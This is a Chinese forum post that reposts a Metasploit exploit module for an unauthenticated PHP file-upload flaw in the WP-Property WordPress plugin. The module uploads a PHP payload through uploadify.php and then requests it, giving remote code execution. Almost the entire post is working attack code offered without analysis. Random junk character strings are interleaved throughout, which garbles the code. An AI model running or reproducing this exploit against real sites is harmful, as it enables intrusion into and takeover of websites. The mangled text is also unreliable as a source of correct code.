WordPress WP-Property PHP 文件上传漏洞
5 j: Q- ^# ~% i. J' \$ h) P. E" S' P' s, M
## # This file is part of the Metasploit Framework and may be subject to
; j' R- C E6 N" m X% E6 z+ w9 W1 H
# redistribution and commercial restrictions. Please see the Metasploit
' Q& ~* y6 `+ z0 O1 c/ w2 b0 X }
3 S/ S4 o* \! r$ I- X* j! ]! p# Framework web site for more information on licensing and terms of use.
$ m$ \2 _5 w, A2 ~# u
% A Y+ m- c9 j9 D2 k, F, j# http://metasploit.com/framework/ ##1 I. L- s" q- d4 g' B2 B
$ M1 J( T* l! q6 {
) g, c. `9 ?6 G3 @9 o) N% _
x: B1 w8 k% W+ x9 a ( `# H6 B' T. s X" ^) L8 l
6 @( |' t' K$ i$ x
require 'msf/core'9 Z1 ?% ?! O7 G& Z) W* x# ~
require 'msf/core/exploit/php_exe': u% ^% G& \* Z1 \; |" ?% a" n
4 ~) v4 l ]$ N% o' r
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',6 F# t$ o+ X" ~9 ^
'Description' => %q{
, |8 |- [( D6 |9 q" iThis module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
" s* u5 P. v: g3 `- _) q9 Q[
# w. l& U/ a( _- t'Sammy FORGIT', # initial discovery
s q- [2 g( q, m8 i1 d' G'James Fitts <fitts.james[at]gmail.com>' # metasploit module
8 q* w. g2 C" L) k],- x8 \7 a$ x: C$ |0 H
'License' => MSF_LICENSE,6 g- r& e" B) v4 W, \. J
'References' =>
# |5 g: d. V, ^+ k[# y! d' z! n8 I: e7 T- c9 i+ y4 |
[ 'OSVDB', '82656' ],
& o! \8 Z7 e+ A: T[ 'BID', '53787' ],
: t( ~ u% \. e4 F[ 'EDB', '18987'],/ }4 z, g0 w, A3 c* T
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
9 Q+ j3 |+ X7 f1 q: b: h],
+ Q/ |* H6 x0 ]. H'Payload' =>0 u# s H4 T0 c+ u# L
{+ t% V% q9 k+ v5 k' Z2 ]
'BadChars' => "\x00",, ~ J6 \1 s1 C5 @
},$ s" Z H2 R& P9 K9 k, C+ E; Q
'Platform' => 'php',
! D1 y3 H9 w4 ~' U3 _$ {0 E: Z/ J'Arch' => ARCH_PHP,
% p* s. H# p. Z- v0 s'Targets' =>9 Z! S8 t( P! D, |1 I0 H
[, K& n# T' S. E& j& ] z# P
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ], h) X' G/ u7 z
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]) t! t7 J8 b' \8 v9 V
],
, _: z/ _; }7 ?! t8 |'DefaultTarget' => 0,4 U; ~ m$ |9 n$ f. _3 r$ f2 i
'DisclosureDate' => 'Mar 26 2012'))7 n2 L- O8 j6 b" s) L% ?: j. T
0 p5 u ^9 Z: s6 R$ M6 W) w
register_options(
: F* f4 C' G$ C. K2 Y- R[
J' l; u! N: IOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])5 Q( o4 Z6 L2 Y' x, Z( k9 Q- s
], self.class)
8 t# l9 N6 f( P" {/ fend
" g1 l8 n1 y! x- v' r& ~. S; B4 g; F& ~6 f( u x/ r) z! r
def check. k* g; \1 w i# W
uri = target_uri.path
" d6 c- H9 K6 v y( a5 f- ouri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',8 W x5 U z3 E b0 x
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"7 F* R: {' E; u0 o! j: A- A
})
/ Y" J# `( R* G1 p& x1 m% H+ S# r: w( H' m' m0 b- B% O3 ]
if not res or res.code != 200
; T7 x1 M( d/ i% P" i Kreturn Exploit::CheckCode::Unknown5 y( p- }, B) `
end
5 ]/ T3 k. x! F; {' m
" C- I# ^$ l% e( v% {return Exploit::CheckCode::Appears
- J# d# r' s9 c% V) w1 ?( Hend
, W$ R# v/ Z* e* `
1 D/ @- U6 u4 c' ?: {2 f6 v% A, rdef exploit! c3 F5 A2 G# N( @( b
uri = target_uri.path! Z3 _1 a/ J) b2 P2 z& R
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)2 X) W. r/ P+ x, `- b
, G8 ^- Q6 a# N1 {data = Rex::MIME::Message.new0 F# N5 w- \' q0 R+ z* Q
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"") Y: ?5 F7 y, o' {7 A
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
0 e% M$ u1 P9 S% h% D F# ^post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
4 W! V G5 Q q4 N+ _. _1 J/ ?# O
' T. i7 b& L, }" N! lprint_status("#{peer} - Uploading payload #{@payload_name}")
3 [8 D0 d- C9 h% h, w6 Ares = send_request_cgi({
6 J7 y# ?' `) s/ o'method' => 'POST',
6 o# l( \( s$ x4 T'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",$ |; b+ O( G. x5 L
'ctype' => "multipart/form-data; boundary=#{data.bound}",7 W D) p1 F6 P6 H# s& D
'data' => post_data
- X' g- O) g; F' C. R})
0 c- C. P( s. V% o! z# Y
% Q- f' I, I6 {. l- T; x" U# ?if not res or res.code != 200 or res.body !~ /#{@payload_name}/0 b9 W+ ^# Y" N9 {; ~7 S& a
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
! D; R$ [4 l# D) {# Tend% {; g3 {( |0 [+ a; L3 F2 q: |2 x
; T2 c" B) Y5 w, b
upload_uri = res.body5 T7 y: l) [& _
4 b a+ M, A- f& ]. r7 I1 O: Nprint_status("#{peer} - Executing payload #{@payload_name}")
( p2 ]' p: T8 Q5 j2 hres = send_request_raw({* v8 ]! L% O! h2 c, H6 g/ ~
'uri' => upload_uri," ^' v! e; A# g, c0 [* _
'method' => 'GET': a& [7 n' K: E) b8 B
}) {: w- Q" m% l0 D6 M4 z0 {- R
end
8 Z' d( O8 F6 H2 ]end' |2 j0 f2 } N# V1 F
" D3 b9 l6 M$ ~/ y. J不要问我这写的是什么 怎么利用 我是说msf.
$ X' E B* O6 |% R
" p5 c7 m2 j/ g6 ?, l. [ |
发表于 2013-1-4 19:51:30
收藏
支持
反对